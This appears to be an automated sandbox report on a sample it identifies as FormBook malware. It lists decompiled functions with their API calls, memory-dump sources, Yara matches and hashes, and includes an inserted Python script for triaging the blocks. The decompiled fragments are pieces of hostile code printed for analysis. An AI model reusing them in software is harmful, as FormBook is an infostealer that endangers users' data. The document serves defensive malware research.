                                                                                    • Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                                    • Instruction ID: f6872c6640a97d379917802917a35d8835196bd2b620e753e6f67e56f73dccdd
                                                                                    • Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                                    • Instruction Fuzzy Hash: EC0100B5D0010DBBDB10DAA5EC42FDEB778AB54318F0041A9A908A7281F635EA54C795
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 84%
                                                                                    			E004181C0(void* __ebx, intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, void* _a48) {
                                                                                    				void* _v3;
                                                                                    				intOrPtr _t15;
                                                                                    				signed char _t16;
                                                                                    				long _t21;
                                                                                    				long _t23;
                                                                                    				void* _t31;
                                                                                    				long _t33;
                                                                                    
                                                                                    				_t15 = _a4;
                                                                                    				_t23 =  *(_t15 + 0x10);
                                                                                    				_t3 = _t15 + 0xc40; // 0xc40
                                                                                    				_t16 = E00418DC0(_t31, _t15, _t3, _t23, 0, 0x28);
                                                                                    				 *(__ebx - 0x3b7cd3b3) =  *(__ebx - 0x3b7cd3b3) ^ _t23;
                                                                                    				asm("adc al, 0x52");
                                                                                    				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _t23, _t16 ^ 0x0000008b, _t33); // executed
                                                                                    				return _t21;
                                                                                    			}

                                                                                    APIs
                                                                                    • NtCreateFile.NTDLL(00000060,00408AF3,?,00413B97,00408AF3,FFFFFFFF,?,?,FFFFFFFF,00408AF3,00413B97,?,00408AF3,00000060,00000000,00000000), ref: 0041820D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.275240256.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CreateFile
                                                                                    • String ID:
                                                                                    • API String ID: 823142352-0
                                                                                    • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                    • Instruction ID: 76db84dd9462a71377061bd321799a59568980bd09e0245c51acac76316ecf65
                                                                                    • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                    • Instruction Fuzzy Hash: 52F0B6B2200208ABCB08CF89DC85DEB77ADAF8C754F158248FA0D97241C630E8518BA4
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 75%
                                                                                    			E004181BA(void* __ebx, intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, void* _a48) {
                                                                                    				void* _v3;
                                                                                    				intOrPtr _t15;
                                                                                    				signed char _t16;
                                                                                    				long _t21;
                                                                                    				long _t23;
                                                                                    				void* _t31;
                                                                                    				long _t36;
                                                                                    				long _t39;
                                                                                    
                                                                                    				asm("adc esp, [edi+eax*8+0x55749e0c]");
                                                                                    				_t36 = _t39;
                                                                                    				_t15 = _a4;
                                                                                    				_t23 =  *(_t15 + 0x10);
                                                                                    				_t3 = _t15 + 0xc40; // 0xc40
                                                                                    				_t16 = E00418DC0(_t31, _t15, _t3, _t23, 0, 0x28);
                                                                                    				 *(__ebx - 0x3b7cd3b3) =  *(__ebx - 0x3b7cd3b3) ^ _t23;
                                                                                    				asm("adc al, 0x52");
                                                                                    				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _t23, _t16 ^ 0x0000008b, _t36); // executed
                                                                                    				return _t21;
                                                                                    			}

                                                                                    APIs
                                                                                    • NtCreateFile.NTDLL(00000060,00408AF3,?,00413B97,00408AF3,FFFFFFFF,?,?,FFFFFFFF,00408AF3,00413B97,?,00408AF3,00000060,00000000,00000000), ref: 0041820D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.275240256.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CreateFile
                                                                                    • String ID:
                                                                                    • API String ID: 823142352-0
                                                                                    • Opcode ID: edcc572d20d658b09244c3f101f520ca345bd06ac2fcb3511e7a9f272df0d7fc
                                                                                    • Instruction ID: fae6ffa33bf77168ea0cd424f9f4fd6a4ef7e0647b005e22d2a95e62c3cf46de
                                                                                    • Opcode Fuzzy Hash: edcc572d20d658b09244c3f101f520ca345bd06ac2fcb3511e7a9f272df0d7fc
                                                                                    • Instruction Fuzzy Hash: 4E01A4B2211108ABCB48CF89DC95DEB77A9EF8C754F158248FA1997241D630E8518BA4
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E004183A0(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                                                                    				long _t14;
                                                                                    				void* _t21;
                                                                                    
                                                                                    				_t3 = _a4 + 0xc60; // 0xca0
                                                                                    				E00418DC0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
                                                                                    				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                                                                    				return _t14;
                                                                                    			}

                                                                                    APIs
                                                                                    • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F94,?,00000000,?,00003000,00000040,00000000,00000000,00408AF3), ref: 004183D9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.275240256.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AllocateMemoryVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 2167126740-0
                                                                                    • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                    • Instruction ID: ed05b43336be2385218ce2c210938f1a749d46cd8ec257da0df7421e0e4bafff
                                                                                    • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                    • Instruction Fuzzy Hash: BCF015B2200208ABCB14DF89DC81EEB77ADAF88754F118549FE0897241CA30F810CBA4
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 82%
                                                                                    			E004182F0(void* __esi, intOrPtr _a4, void* _a8) {
                                                                                    				long _t8;
                                                                                    				void* _t11;
                                                                                    
                                                                                    				_t5 = _a4;
                                                                                    				_t2 = _t5 + 0x10; // 0x300
                                                                                    				_t3 = _t5 + 0xc50; // 0x409743
                                                                                    				E00418DC0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
                                                                                    				_t8 = NtClose(_a8);
                                                                                    				asm("rcr byte [esi+0x5d], 1");
                                                                                    				return _t8;
                                                                                    			}

                                                                                    APIs
                                                                                    • NtClose.NTDLL(00413D30,?,?,00413D30,00408AF3,FFFFFFFF), ref: 00418315
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.275240256.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Close
                                                                                    • String ID:
                                                                                    • API String ID: 3535843008-0
                                                                                    • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                    • Instruction ID: fa02b1b0b4c248d7afc65a810b6911db7169f724aa7cfa6c67706bd771296af7
                                                                                    • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                    • Instruction Fuzzy Hash: F5D01776200314ABD710EF99DC85EE77BACEF48760F154499BA189B282CA30FA0086E0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.275643619.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 075926850b245a4db6de9a752ef0af7399fa09e12b1bb925aee8624c6a621dff
                                                                                    • Instruction ID: ce0d6dce66d879e33f6c40a8e508eeb5a1711006ba0e35d2e663a55ae85a855a
                                                                                    • Opcode Fuzzy Hash: 075926850b245a4db6de9a752ef0af7399fa09e12b1bb925aee8624c6a621dff
                                                                                    • Instruction Fuzzy Hash: 0590026260100502D20171598404A16014AD7D0381F91C077E101455AECA6589A2F671
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.275643619.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: b5647efba6d676840afa7f96a2592fcbb5a5f32453c1683b2fec89ba688679c8
                                                                                    • Instruction ID: 9eb69281b6446c6de08db11e229d61495eb594aaeebd43d1ec186b184904c664
                                                                                    • Opcode Fuzzy Hash: b5647efba6d676840afa7f96a2592fcbb5a5f32453c1683b2fec89ba688679c8
                                                                                    • Instruction Fuzzy Hash: CC90027220100413D21171598504B070149D7D0381F91C467E041455DD96968962F661
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.275643619.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 5b949a19c827e6458daa5f7621982979fd964dba8ec9d4682b4cea93ed94a844
                                                                                    • Instruction ID: 061872587d756b2b6a952fbf2d087fccdd503f372d0caeb2b6caf3e5c4033e98
                                                                                    • Opcode Fuzzy Hash: 5b949a19c827e6458daa5f7621982979fd964dba8ec9d4682b4cea93ed94a844
                                                                                    • Instruction Fuzzy Hash: 05900262242041525645B15984049074146E7E0381791C067E1404955C85669866EB61
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.275643619.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 0343115eb501028d1ce02005338e7a7fa97d06521c12dcdbd6a8b61c2883b6f9
                                                                                    • Instruction ID: 9da24e97d4b011f738d8982c3ce8b730d900356ba9609f783baa97114112606c
                                                                                    • Opcode Fuzzy Hash: 0343115eb501028d1ce02005338e7a7fa97d06521c12dcdbd6a8b61c2883b6f9
                                                                                    • Instruction Fuzzy Hash: FF9002A234100442D20071598414F060145D7E1341F51C06AE1054559D8659CC62F666
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.275643619.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 6fab2b7e926b4072c7597eb4ef3affbf7d48e57440592511295b9aeaf8f70768
                                                                                    • Instruction ID: 90f86da2c744b51d0b1490cbf77feee4780841c83c4da16e7610f395fe283644
                                                                                    • Opcode Fuzzy Hash: 6fab2b7e926b4072c7597eb4ef3affbf7d48e57440592511295b9aeaf8f70768
                                                                                    • Instruction Fuzzy Hash: 6E9002B220100402D24071598404B460145D7D0341F51C066E5054559E86998DE5FBA5
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.275643619.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 62844ecfab3a7b5d35e796f7d3647fb821f881413c35a4315c0b1177f19e02e2
                                                                                    • Instruction ID: 8518f7d971b8385b00d46df963d5d08d852c4c5abbad2dfd0f3d464990a1448c
                                                                                    • Opcode Fuzzy Hash: 62844ecfab3a7b5d35e796f7d3647fb821f881413c35a4315c0b1177f19e02e2
                                                                                    • Instruction Fuzzy Hash: 549002626010004242407169C844D064145FBE1351751C176E0988555D85998875EBA5
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.275643619.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 729e474e75fab14150416d90da99b421810f190dab45dd746b5c9fca17d1611f
                                                                                    • Instruction ID: 86913b632f1dd0a44cadd4c0b8c9aaeb6cb56c89aaac841c445bbf4a6ce844fb
                                                                                    • Opcode Fuzzy Hash: 729e474e75fab14150416d90da99b421810f190dab45dd746b5c9fca17d1611f
                                                                                    • Instruction Fuzzy Hash: 0A90027220140402D20071598814B0B0145D7D0342F51C066E115455AD86658861FAB1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.275643619.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: da7a2fdaaae53ca40e7fdc202c5f7ee796165d655eaaa3b53b29fbe842dfb4f1
                                                                                    • Instruction ID: 85431d05685d319fed4f690c07b426bd3616a5f4e68691619912fc76efab5d9e
                                                                                    • Opcode Fuzzy Hash: da7a2fdaaae53ca40e7fdc202c5f7ee796165d655eaaa3b53b29fbe842dfb4f1
                                                                                    • Instruction Fuzzy Hash: 3990026221180042D30075698C14F070145D7D0343F51C16AE0144559CC9558871EA61
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.275643619.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 5ad1840c76811aa117efdd754b4724a100c2af2d38dab46594ef5759b7fb1f3a
                                                                                    • Instruction ID: 56603ca9c53d385a80cf7bb611a13209602c8ba3b1bdc73bcc36e00c41e33fa9
                                                                                    • Opcode Fuzzy Hash: 5ad1840c76811aa117efdd754b4724a100c2af2d38dab46594ef5759b7fb1f3a
                                                                                    • Instruction Fuzzy Hash: 3B9002A220200003420571598414A16414AD7E0341B51C076E1004595DC56588A1F665
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.275643619.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 909d3b5a9e48934d2f9cd680104ece8b66dfbc1b8a3d597d612f7c160fe0170b
                                                                                    • Instruction ID: c9a959d7522151d9d0f6a705b83cb645f0f23cf5b46546335af526c168ccb99c
                                                                                    • Opcode Fuzzy Hash: 909d3b5a9e48934d2f9cd680104ece8b66dfbc1b8a3d597d612f7c160fe0170b
                                                                                    • Instruction Fuzzy Hash: A9900266211000030205B55947049070186D7D5391351C076F1005555CD6618871E661
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.275643619.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: b0856fe86f9d909fafbf37032993a2251b2e451fc86639fe0971f2d549a47ea6
                                                                                    • Instruction ID: e16c3bbb2738a46380d85e3196ee5a816bcb28d37a777420db30898e17dc07bf
                                                                                    • Opcode Fuzzy Hash: b0856fe86f9d909fafbf37032993a2251b2e451fc86639fe0971f2d549a47ea6
                                                                                    • Instruction Fuzzy Hash: 6690027220108802D2107159C404B4A0145D7D0341F55C466E441465DD86D588A1F661
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.275643619.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: b904b9b8ed6beadf4652ab7e58c1b46eff4bd18cd81736f9d23bb31898439474
                                                                                    • Instruction ID: b2f3d2a66bee0d2f2452ac2e74e391c4f59afcd1ac0cc30fb83436a946d8b7ad
                                                                                    • Opcode Fuzzy Hash: b904b9b8ed6beadf4652ab7e58c1b46eff4bd18cd81736f9d23bb31898439474
                                                                                    • Instruction Fuzzy Hash: FF90027220100802D28071598404A4A0145D7D1341F91C06AE0015659DCA558A69FBE1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.275643619.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 6b6fe2e44749e9200480314ce98438b195a88cffc70be17b6551c4785d63b860
                                                                                    • Instruction ID: 025cb29e532ecc119f5fdd41d7433a0aeebaf252031769ba4c637240d42c0113
                                                                                    • Opcode Fuzzy Hash: 6b6fe2e44749e9200480314ce98438b195a88cffc70be17b6551c4785d63b860
                                                                                    • Instruction Fuzzy Hash: A590026230100003D24071599418A064145E7E1341F51D066E0404559CD9558866E762
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.275643619.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: ae34870d37ac1b19feb61773375b2c676122b9d9d7cc4f8fcd330a860eae01c4
                                                                                    • Instruction ID: 5dfa6c933f30dd59c5b9af5b6a2e73c4648d4bf628751f84d45324630e55fc66
                                                                                    • Opcode Fuzzy Hash: ae34870d37ac1b19feb61773375b2c676122b9d9d7cc4f8fcd330a860eae01c4
                                                                                    • Instruction Fuzzy Hash: C790026A21300002D28071599408A0A0145D7D1342F91D46AE000555DCC9558879E761
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.275643619.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 7773cfefede6284dbba26a2246fbe1e1a43980012409739214e851d7602aba7a
                                                                                    • Instruction ID: 29132c593c4d79ab0d172ace2f5a2d920761199e7903d005f506627bf1baeec3
                                                                                    • Opcode Fuzzy Hash: 7773cfefede6284dbba26a2246fbe1e1a43980012409739214e851d7602aba7a
                                                                                    • Instruction Fuzzy Hash: 2890027231114402D2107159C404B060145D7D1341F51C466E081455DD86D588A1F662
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.275643619.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 2885fe68a636094b4e3d80c6dc69f338cf54639e6412c4a6ba0fa16259e8f640
                                                                                    • Instruction ID: fa01ffcd26241440f0f1d8948560431c01da16209a912eac58e2da253c2b16f3
                                                                                    • Opcode Fuzzy Hash: 2885fe68a636094b4e3d80c6dc69f338cf54639e6412c4a6ba0fa16259e8f640
                                                                                    • Instruction Fuzzy Hash: 3E90027220100402D20075999408A460145D7E0341F51D066E501455AEC6A588A1F671
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.275240256.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 67bb4e2207c22d687f6acc024d55c7e0c161e5d4599185de851a30ee67947c6b
                                                                                    • Instruction ID: aa626ceb7ef0a3bcdbf1efb1d9dc2f5a7bb3811b4857f0e914c6161f28eec10c
                                                                                    • Opcode Fuzzy Hash: 67bb4e2207c22d687f6acc024d55c7e0c161e5d4599185de851a30ee67947c6b
                                                                                    • Instruction Fuzzy Hash: FE213AB3D402085BDB10E6649D42BFF73AC9B50304F44057FF989A3182F638BB4987A6
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

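                                                                                    The per-function blocks above all share one layout (API references, Memory Dump Source, Similarity bullets, Uniqueness Score). The following is an added example, not Joe Sandbox code, that parses that layout and separates the seventeen InitializeThunk stubs in the 0xB10000 region from the functions in the main image that carry a resolved API reference or a Yara match. The sample text is constructed from three of the blocks above with the Opcode ID and some empty bullets dropped; the stub heuristic in triage() is an assumption made for triage, not a definition from the report.

```python
# Added example (not Joe Sandbox code): parse Joe Sandbox per-function metadata
# blocks and triage them. SAMPLE is constructed from three blocks of this report
# (trimmed). The stub heuristic in triage() is an assumption, not a report rule.
import re
from collections import Counter

BULLET = re.compile(r"^• ([A-Za-z ]+?): ?(.*)$")
API_REF = re.compile(r"^• (\w+)\.(\w+)\((.*)\), ref: ([0-9A-Fa-f]+)$")
OFFSET = re.compile(r"Offset: ([0-9A-Fa-f]+)")
SCORE = re.compile(r"^Uniqueness Score: (-?[\d.]+)%$")

SAMPLE = """\
APIs
• NtClose.NTDLL(00413D30,?,?,00413D30,00408AF3,FFFFFFFF), ref: 00418315
Memory Dump Source
• Source File: 00000001.00000002.275240256.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: Close
• Instruction ID: fa02b1b0b4c248d7afc65a810b6911db7169f724aa7cfa6c67706bd771296af7
• Instruction Fuzzy Hash: F5D01776200314ABD710EF99DC85EE77BACEF48760F154499BA189B282CA30FA0086E0
Uniqueness Score: -1.00%
APIs
Memory Dump Source
• Source File: 00000001.00000002.275643619.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
Similarity
• API ID: InitializeThunk
• Instruction ID: ce0d6dce66d879e33f6c40a8e508eeb5a1711006ba0e35d2e663a55ae85a855a
• Instruction Fuzzy Hash: 0590026260100502D20171598404A16014AD7D0381F91C077E101455AECA6589A2F671
Uniqueness Score: -1.00%
Memory Dump Source
• Source File: 00000001.00000002.275240256.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID:
• String ID:
• Instruction ID: aa626ceb7ef0a3bcdbf1efb1d9dc2f5a7bb3811b4857f0e914c6161f28eec10c
• Instruction Fuzzy Hash: FE213AB3D402085BDB10E6649D42BFF73AC9B50304F44057FF989A3182F638BB4987A6
Uniqueness Score: -1.00%
"""


def parse_blocks(text):
    """Return one dict per function block; a block ends at its Uniqueness Score line.
    Bullet labels become keys ('API ID', 'Instruction Fuzzy Hash', ...); resolved
    API references are collected in 'api_refs', the dump base in 'offset'."""
    blocks = []
    cur = {"api_refs": [], "yara": False, "offset": None}
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = SCORE.match(line)
        if m:
            cur["score"] = float(m.group(1))
            blocks.append(cur)
            cur = {"api_refs": [], "yara": False, "offset": None}
            continue
        if line == "Yara matches":
            cur["yara"] = True
            continue
        m = API_REF.match(line)
        if m:
            cur["api_refs"].append({"api": m.group(1), "module": m.group(2),
                                    "args": m.group(3), "ref": m.group(4)})
            continue
        m = BULLET.match(line)
        if m:
            cur[m.group(1)] = m.group(2)
            if m.group(1) == "Source File":
                om = OFFSET.search(m.group(2))
                cur["offset"] = om.group(1) if om else None
    return blocks


def triage(blocks):
    """Split stubs from functions worth reversing.
    Assumption: an 'InitializeThunk' block with no API reference is a loader/thunk
    stub and is only counted per dump region; a block with a Yara hit or a resolved
    API reference goes on the review list, keyed by the first 12 hex digits of its
    Instruction ID."""
    stubs, review = Counter(), []
    for b in blocks:
        if b.get("API ID") == "InitializeThunk" and not b["api_refs"]:
            stubs[b["offset"]] += 1
            continue
        if b["yara"] or b["api_refs"]:
            review.append({
                "id": b.get("Instruction ID", "")[:12],
                "offset": b["offset"],
                "apis": [f'{r["api"]}.{r["module"]}@{r["ref"]}' for r in b["api_refs"]],
                "yara": b["yara"],
            })
    return {"stubs": dict(stubs), "review": review}
```

Run against the full report text, the stub counter collapses the repeated InitializeThunk entries into one count per dump region, while the review list keeps only blocks in the 0x400000 image that reference an API or carry a Yara match, which is where the FormBook logic of this sample lives.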
                                                                                    C-Code - Quality: 82%
                                                                                    			E00407260(void* __ebx, void* __edx, void* __eflags, intOrPtr _a4, long _a8) {
                                                                                    				char _v67;
                                                                                    				char _v68;
                                                                                    				void* _t12;
                                                                                    				intOrPtr* _t13;
                                                                                    				int _t14;
                                                                                    				void* _t20;
                                                                                    				long _t23;
                                                                                    				intOrPtr* _t27;
                                                                                    				void* _t28;
                                                                                    				void* _t32;
                                                                                    
                                                                                    				_t32 = __eflags;
                                                                                    				_t20 = __edx;
                                                                                    				_v68 = 0;
                                                                                    				L00419D20( &_v67, 0, 0x3f);
                                                                                    				E0041A900(__ebx, _t20,  &_v68, 3);
                                                                                    				_t12 = E00409B20(_t32, _a4 + 0x1c,  &_v68); // executed
                                                                                    				_t13 = L00413E30(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
                                                                                    				_t27 = _t13;
                                                                                    				if(_t27 != 0) {
                                                                                    					_t23 = _a8;
                                                                                    					_t14 = PostThreadMessageW(_t23, 0x111, 0, 0); // executed
                                                                                    					_t34 = _t14;
                                                                                    					if(_t14 == 0) {
                                                                                    						_t14 =  *_t27(_t23, 0x8003, _t28 + (L00409280(_t34, 1, 8) & 0x000000ff) - 0x40, _t14);
                                                                                    					}
                                                                                    					return _t14;
                                                                                    				}
                                                                                    				return _t13;
                                                                                    			}

                                                                                    APIs
                                                                                    • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072BA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000001.220049197.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: MessagePostThread
                                                                                    • String ID:
                                                                                    • API String ID: 1836367815-0
                                                                                    • Opcode ID: 2611248cf2981be21f72ca7afad4f10f88413beaa9ea5ad5021ab45b4f53d4d7
                                                                                    • Instruction ID: bbcd0b2e5740072d15388175686a93538b06234ac68ffc2b081785cbfc84dfa6
                                                                                    • Opcode Fuzzy Hash: 2611248cf2981be21f72ca7afad4f10f88413beaa9ea5ad5021ab45b4f53d4d7
                                                                                    • Instruction Fuzzy Hash: 2B01D431A8022876E720A6959C03FFF772C9B00B54F05405EFF04BA1C2E6A87D0682EA
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 20%
                                                                                    			E00407233(void* __eax, signed int __edx, void* __esi) {
                                                                                    				intOrPtr* _t6;
                                                                                    
                                                                                    				_t6 = __eax - 0xe1;
                                                                                    				asm("das");
                                                                                    				asm("das");
                                                                                    				asm("loop 0x62");
                                                                                    				asm("adc esp, [ebp-0x751e73a0]");
                                                                                    				 *(__esi + 0x68) =  *(__esi + 0x68) | __edx;
                                                                                    				_push(__esi);
                                                                                    				_push(0x11c6f95e);
                                                                                    				asm("adc eax, ebp");
                                                                                    				 *_t6 =  *_t6 + _t6;
                                                                                    				return E004195B0(0x24) + _t6 + 0x1000;
                                                                                    			}

                                                                                    APIs
                                                                                    • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072BA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.275240256.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: MessagePostThread
                                                                                    • String ID:
                                                                                    • API String ID: 1836367815-0
